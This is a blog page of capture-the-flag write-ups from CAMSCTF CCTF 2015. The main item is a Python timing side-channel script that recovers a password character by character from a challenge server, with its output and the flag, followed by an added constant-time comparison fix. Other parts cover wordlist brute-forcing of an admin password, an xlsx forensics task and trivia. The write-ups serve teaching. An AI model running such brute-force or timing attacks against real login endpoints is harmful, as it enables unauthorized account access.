
Saturday, April 25, 2015

CAMSCTF CCTF 2015: Web B (Exploitation) Write-up

Description:
"Time is what we want most, but what we use worst." - William Penn
Solution:

          Target: http://web.camsctf.com/b/



          Intercept the HTTP request with Burp Suite.

          debug=0? Try changing debug to 1.

          Base64-decode the reply to get a start time and an end time.

          "Time": when I saw this word, I thought it must be about a side-channel attack. My solution is below.

#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
# Python 2 script: try every printable character after the known prefix and
# print the server-side time difference reported for each candidate.
import urllib, urllib2, string, re, sys

def minus(num):
    # num is [start, end]; the result is start - end, so it is negative
    return float(num[0]) - float(num[1])

url_check = 'http://web.camsctf.com/b/check.php'
for i in list(string.printable):
    password = sys.argv[1] + i
    post_data = urllib.urlencode({'password': password, 'debug': '1'})
    req = urllib2.Request(url_check, post_data)
    resp = urllib2.urlopen(req).read()
    b64 = re.search("\"reply\":\"(.*)\"", resp).group(1)
    print "Password {0} : {1}".format(password, b64)
    if b64.startswith("Flag"):
        break  # the reply is the flag, not a Base64 timing pair
    num = b64.decode('base64').split("-")
    result = minus(num)
    print "Password {0} : {1}".format(password, result)
'''
root@ubuntu:~# python web300.py "" # note the different amounts of time taken to process each candidate
...[snip]...
root@ubuntu:~# python web300.py "u"
...[snip]...
root@ubuntu:~# python web300.py "uH"
...[snip]...
root@ubuntu:~# python web300.py "uHH"
...[snip]...
root@ubuntu:~# python web300.py "uHH>n"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)["
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[K"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v"
...[snip]...
root@ubuntu:~# python web300.py "uHH>nN#)[Ks5v:"
...[snip]...
Password uHH>nN#)[Ks5v:A : MTQyOTY3MzA5OS4zMTk2LTE0Mjk2NzMwOTkuNjAwNg==
Password uHH>nN#)[Ks5v:A : -0.280999898911
Password uHH>nN#)[Ks5v:B : MTQyOTY3MzA5OS45NjI2LTE0Mjk2NzMxMDAuMjQzNw==
Password uHH>nN#)[Ks5v:B : -0.281100034714
Password uHH>nN#)[Ks5v:C : MTQyOTY3MzEwMC41NjUtMTQyOTY3MzEwMC44NDU1
Password uHH>nN#)[Ks5v:C : -0.28049993515
Password uHH>nN#)[Ks5v:D : MTQyOTY3MzEwMS4xOTU5LTE0Mjk2NzMxMDEuNDgxMw==
Password uHH>nN#)[Ks5v:D : -0.285400152206
Password uHH>nN#)[Ks5v:E : Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}
'''
          Send password=uHH>nN#)[Ks5v:E&debug=1 to get the flag. :D

Flag: {how_many_microseconds_did_i_waste_solving_this_0ne}
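
Why the reported processing time gives the password away one character at a time, and how a constant-time comparison removes that signal. This is an added example, not the challenge's server code (the write-up does not show it): it assumes the server compares character by character with an early exit, and SECRET and all function names are constructed for illustration.

```python
import hashlib
import hmac
import string

SECRET = "kT7#x"  # constructed sample secret, not the challenge's password


def leaky_check(guess, secret=SECRET):
    """Early-exit comparison (assumed server behaviour). Returns (ok, steps);
    steps stands in for the processing time exposed by the debug=1 reply."""
    steps = 0
    for i, s in enumerate(secret):
        steps += 1
        if i >= len(guess) or guess[i] != s:
            return False, steps  # stops at the first wrong position
    return len(guess) == len(secret), steps


def constant_time_check(guess, secret=SECRET):
    """Compare fixed-length digests with hmac.compare_digest, so the work done
    does not depend on how many leading characters match."""
    a = hashlib.sha256(guess.encode()).digest()
    b = hashlib.sha256(secret.encode()).digest()
    return hmac.compare_digest(a, b), len(a)  # always 32 bytes compared


def distinguishable_chars(check, prefix):
    """Regression test for a comparison routine: return the next characters
    whose cost differs from the most common cost. An empty list means the
    cost reveals nothing about which character extends the prefix."""
    costs = {c: check(prefix + c)[1] for c in string.printable}
    values = list(costs.values())
    baseline = max(set(values), key=values.count)
    return [c for c, v in costs.items() if v != baseline]


if __name__ == "__main__":
    print("leaky, empty prefix:", distinguishable_chars(leaky_check, ""))
    print("leaky, prefix kT7  :", distinguishable_chars(leaky_check, "kT7"))
    print("constant-time      :", distinguishable_chars(constant_time_check, "kT7"))
```

The comparison fix goes together with not returning timing data to the client: in this challenge the debug=1 reply handed over the start and end times directly.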

CAMSCTF CCTF 2015: Python 2 (Programming) Write-up

Description:
1.) Take the RGB value of every pixel in one image.(Start at (0,0). Move down to (0,299). Go to (1,0). Move to (1,299). And so on. Read the files in numerical order.)
2.) Add all of the R values, G values, and B values in each image. (Have one R sum, one B sum, one G sum for every image.)
3.) Take these sums and convert them into strings. Take the MD5 hash of each string.
4.) Concatenate these MD5 hashes into one string.
5.) Take the MD5 hash of the new string.
6.) Do this for every image and concatenate the final MD5 hashes into one string. (Image 1 final hash + Image 2 final hash + ...)
7.) Take the MD5 of this string to get the flag.
PIL.zip

Solution: 

#!/usr/bin/python
# Author: Kitwipat Towattana (@icheernoom)
import hashlib
from PIL import Image

md5 = []
width = 300
height = 300
for i in range(0,10):
    img_file = "pixels{0}.png".format(i)
    img = Image.open(img_file)
    rgb_img = img.convert('RGB')
    xr = 0
    xg = 0
    xb = 0
    # Walk column by column: (0,0)..(0,299), then (1,0)..(1,299), and so on
    for x in range(0,width):
        for y in range(0,height):
            r, g, b = rgb_img.getpixel((x,y))
            xr += r
            xg += g
            xb += b
    # MD5 of each channel sum as a string, then MD5 of the three hashes joined
    r = hashlib.md5("{0}".format(xr)).hexdigest()
    g = hashlib.md5("{0}".format(xg)).hexdigest()
    b = hashlib.md5("{0}".format(xb)).hexdigest()
    sum_md5 = "{0}{1}{2}".format(r,g,b)
    concate = hashlib.md5("{0}".format(sum_md5)).hexdigest()
    print "[*] MD5 of {0}: {1}".format(img_file,concate)
    md5.append(concate)
# Final flag: MD5 of all per-image hashes concatenated
print "[*] Flag:",hashlib.md5("".join(md5)).hexdigest()
'''
root@ubuntu:/PIL# ls
pixels0.png pixels2.png pixels4.png pixels6.png pixels8.png prog250.py
pixels1.png pixels3.png pixels5.png pixels7.png pixels9.png Thumbs.db
root@ubuntu:/PIL# python prog250.py
[*] MD5 of pixels0.png: e767124634834f12a7152104d4713074
[*] MD5 of pixels1.png: a88372d92bcc6e8f5f569bc3c00fab23
[*] MD5 of pixels2.png: 345265539e1b9078323b7051346892de
[*] MD5 of pixels3.png: 92ae219f8b8403e04b550eb831a017bf
[*] MD5 of pixels4.png: a4bd4eb96fe9cc779c2e81864c81b674
[*] MD5 of pixels5.png: 4723f098c933b160d00678b7be3421c4
[*] MD5 of pixels6.png: 3a4c3cb7b2fd704c4e7717547f7db4d9
[*] MD5 of pixels7.png: bc1f5bc7b30eaac677d6daa37eed5e4c
[*] MD5 of pixels8.png: a4edf81b7f2915c4c1b72d8367c5016a
[*] MD5 of pixels9.png: 864ae043e67a693d7672986487a87813
[*] Flag: 2d98c27f040ce429b35dd84124397f65
root@ubuntu:/PIL#
'''
Flag: 2d98c27f040ce429b35dd84124397f65

CAMSCTF CCTF 2015: Web 2 (Exploitation) Write-up

Description: 
You're probably thinking too hard about this.
Hint:
Remember that time when you guessed the admin password? Yeah.
Solution:
          Target: http://web.camsctf.com/2/

          OK, brute-force time has begun. :D Open Burp Suite, intercept the HTTP request, and send it to the Intruder tab with a wordlist.


          password=letmein

Flag: {still_b3tter_than_princess}

CAMSCTF CCTF 2015: Excel Data (Forensics) Write-up

Description:
Ever wonder why your homework gets corrupted so easily?
Solution: 
          A forensics challenge. Basically, I tried the strings and grep commands to find something. xD
root@ubuntu:~# file excel_data.xlsx 
excel_data.xlsx: Zip archive data, at least v1.0 to extract
root@ubuntu:~# strings excel_data.xlsx | grep "flag"
xl/charts/flag.txt
xl/charts/flag.txt
root@ubuntu:~# mv excel_data.xlsx excel_data.zip
root@ubuntu:~# unzip excel_data.zip 
Archive:  excel_data.zip
   creating: docProps/
  inflating: docProps/app.xml        
  inflating: docProps/core.xml       
   creating: xl/
  inflating: xl/calcChain.xml        
   creating: xl/charts/
  inflating: xl/charts/chart1.xml    
  inflating: xl/charts/chart2.xml    
  inflating: xl/charts/flag.txt      
   creating: xl/drawings/
  inflating: xl/drawings/drawing1.xml  
  inflating: xl/drawings/drawing2.xml  
   creating: xl/drawings/_rels/
  inflating: xl/drawings/_rels/drawing1.xml.rels  
  inflating: xl/drawings/_rels/drawing2.xml.rels  
  inflating: xl/sharedStrings.xml    
  inflating: xl/styles.xml           
   creating: xl/theme/
  inflating: xl/theme/theme1.xml     
  inflating: xl/workbook.xml         
   creating: xl/worksheets/
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/worksheets/sheet2.xml  
  inflating: xl/worksheets/sheet3.xml  
  inflating: xl/worksheets/sheet4.xml  
   creating: xl/worksheets/_rels/
  inflating: xl/worksheets/_rels/sheet2.xml.rels  
  inflating: xl/worksheets/_rels/sheet3.xml.rels  
   creating: xl/_rels/
  inflating: xl/_rels/workbook.xml.rels  
  inflating: [Content_Types].xml     
   creating: _rels/
  inflating: _rels/.rels             
root@ubuntu:~# cat xl/charts/flag.txt 
{iT's_r1gh7_h3r3}
root@ubuntu:~#

Flag: {iT's_r1gh7_h3r3}

CAMSCTF CCTF 2015: Trivia 1-5 (Recon) Write-up

Challenge: Trivia 1
Description:
What is Microsoft's code name for their new internet browser?
Solution: http://en.wikipedia.org/wiki/List_of_Microsoft_codenames
Flag: Spartan

Challenge: Trivia 2
Description:
What is arguably the smallest Linux distribution with a GUI that is still being developed?
Solution: http://www.junauza.com/2011/07/5-tiniest-linux-distributions-for-your.html
Flag: Tiny Core Linux

Challenge: Trivia 3
Description:
As of 2014, how many terabytes of data has Google Inc. indexed? Answer in form of an integer followed by the unit.
Solution: http://www.websitemagazine.com/content/blogs/posts/archive/2014/07/22/do-you-know-how-big-the-internet-really-is-infographic.aspx
Flag: 200 terabytes

Challenge: Trivia 4
Description:
What is the official fastest clock speed of any computer?
Solution: http://en.wikipedia.org/wiki/Clock_rate
Flag: 8.805 GHz

Challenge: Trivia 5
Description:
Which OS is most popular for the Raspberry Pi?
Solution: http://www.linuxuser.co.uk/reviews/top-4-raspberry-pi-os
Flag: Raspbian